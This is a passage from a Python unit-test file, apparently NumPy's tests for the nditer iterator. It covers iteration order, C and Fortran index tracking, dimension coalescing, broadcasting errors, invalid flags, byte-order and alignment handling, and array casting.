Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='F') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='F')) def test_iter_c_or_f_order(): # Test forcing any contiguous (C or F) order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='A') assert_equal([x for x in i], aview.ravel(order='A')) # Fortran-order i = nditer(aview.T, order='A') assert_equal([x for x in i], aview.T.ravel(order='A')) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='A') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='A')) def test_iter_best_order_multi_index_1d(): # The multi-indices should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0,), (1,), (2,), (3,)]) # 1D reversed order i = nditer(a[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(3,), (2,), (1,), (0,)]) def test_iter_best_order_multi_index_2d(): # The multi-indices should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2)]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0), (1, 0), (0, 1), (1, 1), (0, 2), (1, 2)]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0), (1, 1), (1, 2), (0, 0), (0, 1), (0, 2)]) i = 
nditer(a.reshape(2, 3)[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2), (0, 1), (0, 0), (1, 2), (1, 1), (1, 0)]) i = nditer(a.reshape(2, 3)[::-1, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 2), (1, 1), (1, 0), (0, 2), (0, 1), (0, 0)]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0), (0, 0), (1, 1), (0, 1), (1, 2), (0, 2)]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2), (1, 2), (0, 1), (1, 1), (0, 0), (1, 0)]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 2), (0, 2), (1, 1), (0, 1), (1, 0), (0, 0)]) def test_iter_best_order_multi_index_3d(): # The multi-indices should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (0, 2, 0), (0, 2, 1), (1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1), (1, 2, 0), (1, 2, 1)]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0, 2, 0), (1, 2, 0), (0, 0, 1), (1, 0, 1), (0, 1, 1), (1, 1, 1), (0, 2, 1), (1, 2, 1)]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1), (1, 2, 0), (1, 2, 1), (0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (0, 2, 0), (0, 2, 1)]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2, 0), (0, 2, 1), (0, 1, 0), (0, 1, 1), (0, 0, 0), (0, 0, 1), (1, 2, 0), (1, 2, 1), (1, 1, 0), (1, 1, 1), (1, 0, 0), (1, 0, 1)]) i = nditer(a.reshape(2, 
3, 2)[:,:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 1), (0, 0, 0), (0, 1, 1), (0, 1, 0), (0, 2, 1), (0, 2, 0), (1, 0, 1), (1, 0, 0), (1, 1, 1), (1, 1, 0), (1, 2, 1), (1, 2, 0)]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0, 0), (0, 0, 0), (1, 1, 0), (0, 1, 0), (1, 2, 0), (0, 2, 0), (1, 0, 1), (0, 0, 1), (1, 1, 1), (0, 1, 1), (1, 2, 1), (0, 2, 1)]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2, 0), (1, 2, 0), (0, 1, 0), (1, 1, 0), (0, 0, 0), (1, 0, 0), (0, 2, 1), (1, 2, 1), (0, 1, 1), (1, 1, 1), (0, 0, 1), (1, 0, 1)]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 1), (1, 0, 1), (0, 1, 1), (1, 1, 1), (0, 2, 1), (1, 2, 1), (0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0, 2, 0), (1, 2, 0)]) def test_iter_best_order_c_index_1d(): # The C index should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3]) # 1D reversed order i = nditer(a[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 2, 1, 0]) def test_iter_best_order_c_index_2d(): # The C index should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 3, 1, 4, 2, 5]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 4, 5, 0, 1, 2]) i = nditer(a.reshape(2, 3)[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [2, 1, 0, 5, 4, 3]) i = nditer(a.reshape(2, 3)[::-1, ::-1], 
['c_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 4, 3, 2, 1, 0]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 0, 4, 1, 5, 2]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [2, 5, 1, 4, 0, 3]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 2, 4, 1, 3, 0]) def test_iter_best_order_c_index_3d(): # The C index should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 6, 2, 8, 4, 10, 1, 7, 3, 9, 5, 11]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1, 10, 11, 8, 9, 6, 7]) i = nditer(a.reshape(2, 3, 2)[:,:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4, 7, 6, 9, 8, 11, 10]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 0, 8, 2, 10, 4, 7, 1, 9, 3, 11, 5]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 10, 2, 8, 0, 6, 5, 11, 3, 9, 1, 7]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 7, 3, 9, 5, 11, 0, 6, 2, 8, 4, 10]) def test_iter_best_order_f_index_1d(): # The Fortran index should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['f_index'], 
[['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3]) # 1D reversed order i = nditer(a[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 2, 1, 0]) def test_iter_best_order_f_index_2d(): # The Fortran index should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 2, 4, 1, 3, 5]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 3, 5, 0, 2, 4]) i = nditer(a.reshape(2, 3)[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 2, 0, 5, 3, 1]) i = nditer(a.reshape(2, 3)[::-1, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 3, 1, 4, 2, 0]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 4, 3, 2, 1, 0]) def test_iter_best_order_f_index_3d(): # The Fortran index should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 6, 2, 8, 4, 10, 1, 7, 3, 9, 5, 11]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 7, 3, 9, 5, 11, 0, 6, 2, 8, 4, 10]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['f_index'], [['readonly']]) 
assert_equal(iter_indices(i), [4, 10, 2, 8, 0, 6, 5, 11, 3, 9, 1, 7]) i = nditer(a.reshape(2, 3, 2)[:,:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 0, 8, 2, 10, 4, 7, 1, 9, 3, 11, 5]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4, 7, 6, 9, 8, 11, 10]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1, 10, 11, 8, 9, 6, 7]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5]) def test_iter_no_inner_full_coalesce(): # Check no_inner iterators which coalesce into a single inner loop for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: size = np.prod(shape) a = arange(size) # Test each combination of forward and backwards indexing for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) # Fortran-order i = nditer(aview.T, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) def test_iter_no_inner_dim_coalescing(): # Check no_inner iterators whose dimensions may not coalesce completely # Skipping the last element in a dimension prevents coalescing # with the next-bigger dimension a = arange(24).reshape(2, 3, 4)[:,:, :-1] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 2) assert_equal(i[0].shape, (3,)) a = arange(24).reshape(2, 
3, 4)[:, :-1,:] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 2) assert_equal(i[0].shape, (8,)) a = arange(24).reshape(2, 3, 4)[:-1,:,:] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (12,)) # Even with lots of 1-sized dimensions, should still coalesce a = arange(24).reshape(1, 1, 2, 1, 1, 3, 1, 1, 4, 1, 1) i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (24,)) def test_iter_dim_coalescing(): # Check that the correct number of dimensions are coalesced # Tracking a multi-index disables coalescing a = arange(24).reshape(2, 3, 4) i = nditer(a, ['multi_index'], [['readonly']]) assert_equal(i.ndim, 3) # A tracked index can allow coalescing if it's compatible with the array a3d = arange(24).reshape(2, 3, 4) i = nditer(a3d, ['c_index'], [['readonly']]) assert_equal(i.ndim, 1) i = nditer(a3d.swapaxes(0, 1), ['c_index'], [['readonly']]) assert_equal(i.ndim, 3) i = nditer(a3d.T, ['c_index'], [['readonly']]) assert_equal(i.ndim, 3) i = nditer(a3d.T, ['f_index'], [['readonly']]) assert_equal(i.ndim, 1) i = nditer(a3d.T.swapaxes(0, 1), ['f_index'], [['readonly']]) assert_equal(i.ndim, 3) # When C or F order is forced, coalescing may still occur a3d = arange(24).reshape(2, 3, 4) i = nditer(a3d, order='C') assert_equal(i.ndim, 1) i = nditer(a3d.T, order='C') assert_equal(i.ndim, 3) i = nditer(a3d, order='F') assert_equal(i.ndim, 3) i = nditer(a3d.T, order='F') assert_equal(i.ndim, 1) i = nditer(a3d, order='A') assert_equal(i.ndim, 1) i = nditer(a3d.T, order='A') assert_equal(i.ndim, 1) def test_iter_broadcasting(): # Standard NumPy broadcasting rules # 1D with scalar i = nditer([arange(6), np.int32(2)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (6,)) # 2D with scalar i = nditer([arange(6).reshape(2, 3), np.int32(2)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 2D 
with 1D i = nditer([arange(6).reshape(2, 3), arange(3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) i = nditer([arange(2).reshape(2, 1), arange(3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 2D with 2D i = nditer([arange(2).reshape(2, 1), arange(3).reshape(1, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 3D with scalar i = nditer([np.int32(2), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 1D i = nditer([arange(3), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(3), arange(8).reshape(4, 2, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 2D i = nditer([arange(6).reshape(2, 3), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(2).reshape(2, 1), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(3).reshape(1, 3), arange(8).reshape(4, 2, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 3D i = nditer([arange(2).reshape(1, 2, 1), arange(3).reshape(1, 1, 3), arange(4).reshape(4, 1, 1)], ['multi_index'], [['readonly']]*3) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(6).reshape(1, 2, 3), arange(4).reshape(4, 1, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(24).reshape(4, 2, 3), arange(12).reshape(4, 1, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) def 
test_iter_itershape(): # Check that allocated outputs work with a specified shape a = np.arange(6, dtype='i2').reshape(2, 3) i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (2, 3, 4)) assert_equal(i.operands[1].strides, (24, 8, 2)) i = nditer([a.T, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (3, 2, 4)) assert_equal(i.operands[1].strides, (8, 24, 2)) i = nditer([a.T, None], [], [['readonly'], ['writeonly', 'allocate']], order='F', op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (3, 2, 4)) assert_equal(i.operands[1].strides, (2, 6, 12)) # If we specify 1 in the itershape, it shouldn't allow broadcasting # of that dimension to a bigger value assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, 1, 4)) # Test bug that for no op_axes but itershape, they are NULLed correctly i = np.nditer([np.ones(2), None, None], itershape=(2,)) def test_iter_broadcasting_errors(): # Check that errors are thrown for bad broadcasting shapes # 1D with 1D assert_raises(ValueError, nditer, [arange(2), arange(3)], [], [['readonly']]*2) # 2D with 1D assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(2)], [], [['readonly']]*2) # 2D with 2D assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(9).reshape(3, 3)], [], [['readonly']]*2) assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(4).reshape(2, 2)], [], [['readonly']]*2) # 3D with 3D assert_raises(ValueError, nditer, [arange(36).reshape(3, 3, 4), arange(24).reshape(2, 3, 4)], [], [['readonly']]*2) assert_raises(ValueError, nditer, [arange(8).reshape(2, 4, 1), arange(24).reshape(2, 3, 4)], [], [['readonly']]*2) # Verify that the error message mentions the right shapes try: 
nditer([arange(2).reshape(1, 2, 1), arange(3).reshape(1, 3), arange(6).reshape(2, 3)], [], [['readonly'], ['readonly'], ['writeonly', 'no_broadcast']]) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain the shape of the 3rd operand assert_(msg.find('(2,3)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,3)' % msg) # The message should contain the broadcast shape assert_(msg.find('(1,2,3)') >= 0, 'Message "%s" doesn\'t contain broadcast shape (1,2,3)' % msg) try: nditer([arange(6).reshape(2, 3), arange(2)], [], [['readonly'], ['readonly']], op_axes=[[0, 1], [0, np.newaxis]], itershape=(4, 3)) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain "shape->remappedshape" for each operand assert_(msg.find('(2,3)->(2,3)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,3)->(2,3)' % msg) assert_(msg.find('(2,)->(2,newaxis)') >= 0, ('Message "%s" doesn\'t contain remapped operand shape' + '(2,)->(2,newaxis)') % msg) # The message should contain the itershape parameter assert_(msg.find('(4,3)') >= 0, 'Message "%s" doesn\'t contain itershape parameter (4,3)' % msg) try: nditer([np.zeros((2, 1, 1)), np.zeros((2,))], [], [['writeonly', 'no_broadcast'], ['readonly']]) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain the shape of the bad operand assert_(msg.find('(2,1,1)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,1,1)' % msg) # The message should contain the broadcast shape assert_(msg.find('(2,1,2)') >= 0, 'Message "%s" doesn\'t contain the broadcast shape (2,1,2)' % msg) def test_iter_flags_errors(): # Check that bad combinations of flags produce errors a = arange(6) # Not enough operands assert_raises(ValueError, nditer, [], [], []) # Too many operands assert_raises(ValueError, nditer, [a]*100, [], [['readonly']]*100) # Bad 
global flag assert_raises(ValueError, nditer, [a], ['bad flag'], [['readonly']]) # Bad op flag assert_raises(ValueError, nditer, [a], [], [['readonly', 'bad flag']]) # Bad order parameter assert_raises(ValueError, nditer, [a], [], [['readonly']], order='G') # Bad casting parameter assert_raises(ValueError, nditer, [a], [], [['readonly']], casting='noon') # op_flags must match ops assert_raises(ValueError, nditer, [a]*3, [], [['readonly']]*2) # Cannot track both a C and an F index assert_raises(ValueError, nditer, a, ['c_index', 'f_index'], [['readonly']]) # Inner iteration and multi-indices/indices are incompatible assert_raises(ValueError, nditer, a, ['external_loop', 'multi_index'], [['readonly']]) assert_raises(ValueError, nditer, a, ['external_loop', 'c_index'], [['readonly']]) assert_raises(ValueError, nditer, a, ['external_loop', 'f_index'], [['readonly']]) # Must specify exactly one of readwrite/readonly/writeonly per operand assert_raises(ValueError, nditer, a, [], [[]]) assert_raises(ValueError, nditer, a, [], [['readonly', 'writeonly']]) assert_raises(ValueError, nditer, a, [], [['readonly', 'readwrite']]) assert_raises(ValueError, nditer, a, [], [['writeonly', 'readwrite']]) assert_raises(ValueError, nditer, a, [], [['readonly', 'writeonly', 'readwrite']]) # Python scalars are always readonly assert_raises(TypeError, nditer, 1.5, [], [['writeonly']]) assert_raises(TypeError, nditer, 1.5, [], [['readwrite']]) # Array scalars are always readonly assert_raises(TypeError, nditer, np.int32(1), [], [['writeonly']]) assert_raises(TypeError, nditer, np.int32(1), [], [['readwrite']]) # Check readonly array a.flags.writeable = False assert_raises(ValueError, nditer, a, [], [['writeonly']]) assert_raises(ValueError, nditer, a, [], [['readwrite']]) a.flags.writeable = True # Multi-indices available only with the multi_index flag i = nditer(arange(6), [], [['readonly']]) assert_raises(ValueError, lambda i:i.multi_index, i) # Index available only with an index flag 
    # (continuation of the flags-error test started above this block)
    assert_raises(ValueError, lambda i:i.index, i)
    # GotoCoords and GotoIndex incompatible with buffering or no_inner

    # Small helpers: property assignment must be wrapped in a callable so
    # assert_raises can invoke it.
    def assign_multi_index(i):
        i.multi_index = (0,)
    def assign_index(i):
        i.index = 0
    def assign_iterindex(i):
        i.iterindex = 0
    def assign_iterrange(i):
        i.iterrange = (0, 1)

    i = nditer(arange(6), ['external_loop'])
    assert_raises(ValueError, assign_multi_index, i)
    assert_raises(ValueError, assign_index, i)
    assert_raises(ValueError, assign_iterindex, i)
    assert_raises(ValueError, assign_iterrange, i)
    i = nditer(arange(6), ['buffered'])
    assert_raises(ValueError, assign_multi_index, i)
    assert_raises(ValueError, assign_index, i)
    assert_raises(ValueError, assign_iterrange, i)
    # Can't iterate if size is zero
    assert_raises(ValueError, nditer, np.array([]))

def test_iter_slice():
    """Getting/setting iterator operand values through slicing."""
    a, b, c = np.arange(3), np.arange(3), np.arange(3.)
    i = nditer([a, b, c], [], ['readwrite'])
    # Writing through a slice of the iterator writes into the first two
    # operands only.
    i[0:2] = (3, 3)
    assert_equal(a, [3, 1, 2])
    assert_equal(b, [3, 1, 2])
    assert_equal(c, [0, 1, 2])
    i[1] = 12
    assert_equal(i[0:2], [3, 12])

def test_iter_nbo_align_contig():
    """Byte order, alignment, and contiguity requests on operands."""
    # Check that byte order, alignment, and contig changes work
    # Byte order change by requesting a specific dtype
    a = np.arange(6, dtype='f4')
    au = a.byteswap().newbyteorder()
    assert_(a.dtype.byteorder != au.dtype.byteorder)
    i = nditer(au, [], [['readwrite', 'updateifcopy']],
               casting='equiv', op_dtypes=[np.dtype('f4')])
    assert_equal(i.dtypes[0].byteorder, a.dtype.byteorder)
    assert_equal(i.operands[0].dtype.byteorder, a.dtype.byteorder)
    assert_equal(i.operands[0], a)
    # Dropping the iterator (i = None) triggers the updateifcopy writeback.
    i.operands[0][:] = 2
    i = None
    assert_equal(au, [2]*6)
    # Byte order change by requesting NBO
    a = np.arange(6, dtype='f4')
    au = a.byteswap().newbyteorder()
    assert_(a.dtype.byteorder != au.dtype.byteorder)
    i = nditer(au, [], [['readwrite', 'updateifcopy', 'nbo']],
               casting='equiv')
    assert_equal(i.dtypes[0].byteorder, a.dtype.byteorder)
    assert_equal(i.operands[0].dtype.byteorder, a.dtype.byteorder)
    assert_equal(i.operands[0], a)
    i.operands[0][:] = 2
    i = None
    assert_equal(au, [2]*6)
    # Unaligned input (offset an i1 buffer by one byte, view as f4)
    a = np.zeros((6*4+1,), dtype='i1')[1:]
    a.dtype = 'f4'
    a[:] = np.arange(6, dtype='f4')
    assert_(not a.flags.aligned)
    # Without 'aligned', shouldn't copy
    i = nditer(a, [], [['readonly']])
    assert_(not i.operands[0].flags.aligned)
    assert_equal(i.operands[0], a)
    # With 'aligned', should make a copy
    i = nditer(a, [], [['readwrite', 'updateifcopy', 'aligned']])
    assert_(i.operands[0].flags.aligned)
    assert_equal(i.operands[0], a)
    i.operands[0][:] = 3
    i = None
    assert_equal(a, [3]*6)
    # Discontiguous input
    a = arange(12)
    # If it is contiguous, shouldn't copy
    i = nditer(a[:6], [], [['readonly']])
    assert_(i.operands[0].flags.contiguous)
    assert_equal(i.operands[0], a[:6])
    # If it isn't contiguous, should buffer
    i = nditer(a[::2], ['buffered', 'external_loop'],
               [['readonly', 'contig']], buffersize=10)
    assert_(i[0].flags.contiguous)
    assert_equal(i[0], a[::2])

def test_iter_array_cast():
    """Casting of whole array operands via op_dtypes (continues below)."""
    # Check that arrays are cast as requested
    # No cast 'f4' -> 'f4'
    a = np.arange(6, dtype='f4').reshape(2, 3)
    i = nditer(a, [], [['readwrite']], op_dtypes=[np.dtype('f4')])
    assert_equal(i.operands[0], a)
    assert_equal(i.operands[0].dtype, np.dtype('f4'))
    # Byte-order cast '<f4' -> '>f4'
    a = np.arange(6, dtype='<f4').reshape(2, 3)
    i = nditer(a, [], [['readwrite', 'updateifcopy']],
               casting='equiv', op_dtypes=[np.dtype('>f4')])
    assert_equal(i.operands[0], a)
    assert_equal(i.operands[0].dtype, np.dtype('>f4'))
    # Safe case 'f4' -> 'f8'
    a = np.arange(24, dtype='f4').reshape(2, 3, 4).swapaxes(1, 2)
    i = nditer(a, [], [['readonly', 'copy']],
               casting='safe', op_dtypes=[np.dtype('f8')])
    assert_equal(i.operands[0], a)
    assert_equal(i.operands[0].dtype, np.dtype('f8'))
    # The memory layout of the temporary should match a (a is (48,4,16))
    # except negative strides get flipped to positive strides.
    # (continuation of test_iter_array_cast, started above this block)
    assert_equal(i.operands[0].strides, (96, 8, 32))
    a = a[::-1,:, ::-1]
    i = nditer(a, [], [['readonly', 'copy']],
               casting='safe', op_dtypes=[np.dtype('f8')])
    assert_equal(i.operands[0], a)
    assert_equal(i.operands[0].dtype, np.dtype('f8'))
    assert_equal(i.operands[0].strides, (96, 8, 32))
    # Same-kind cast 'f8' -> 'f4' -> 'f8'
    a = np.arange(24, dtype='f8').reshape(2, 3, 4).T
    i = nditer(a, [], [['readwrite', 'updateifcopy']],
               casting='same_kind', op_dtypes=[np.dtype('f4')])
    assert_equal(i.operands[0], a)
    assert_equal(i.operands[0].dtype, np.dtype('f4'))
    assert_equal(i.operands[0].strides, (4, 16, 48))
    # Check that UPDATEIFCOPY is activated: the write only reaches `a`
    # once the iterator is released.
    i.operands[0][2, 1, 1] = -12.5
    assert_(a[2, 1, 1] != -12.5)
    i = None
    assert_equal(a[2, 1, 1], -12.5)

    a = np.arange(6, dtype='i4')[::-2]
    i = nditer(a, [], [['writeonly', 'updateifcopy']],
               casting='unsafe', op_dtypes=[np.dtype('f4')])
    assert_equal(i.operands[0].dtype, np.dtype('f4'))
    # Even though the stride was negative in 'a', it
    # becomes positive in the temporary
    assert_equal(i.operands[0].strides, (4,))
    i.operands[0][:] = [1, 2, 3]
    i = None
    assert_equal(a, [1, 2, 3])

def test_iter_array_cast_errors():
    """Invalid array casts must raise TypeError."""
    # Check that invalid casts are caught
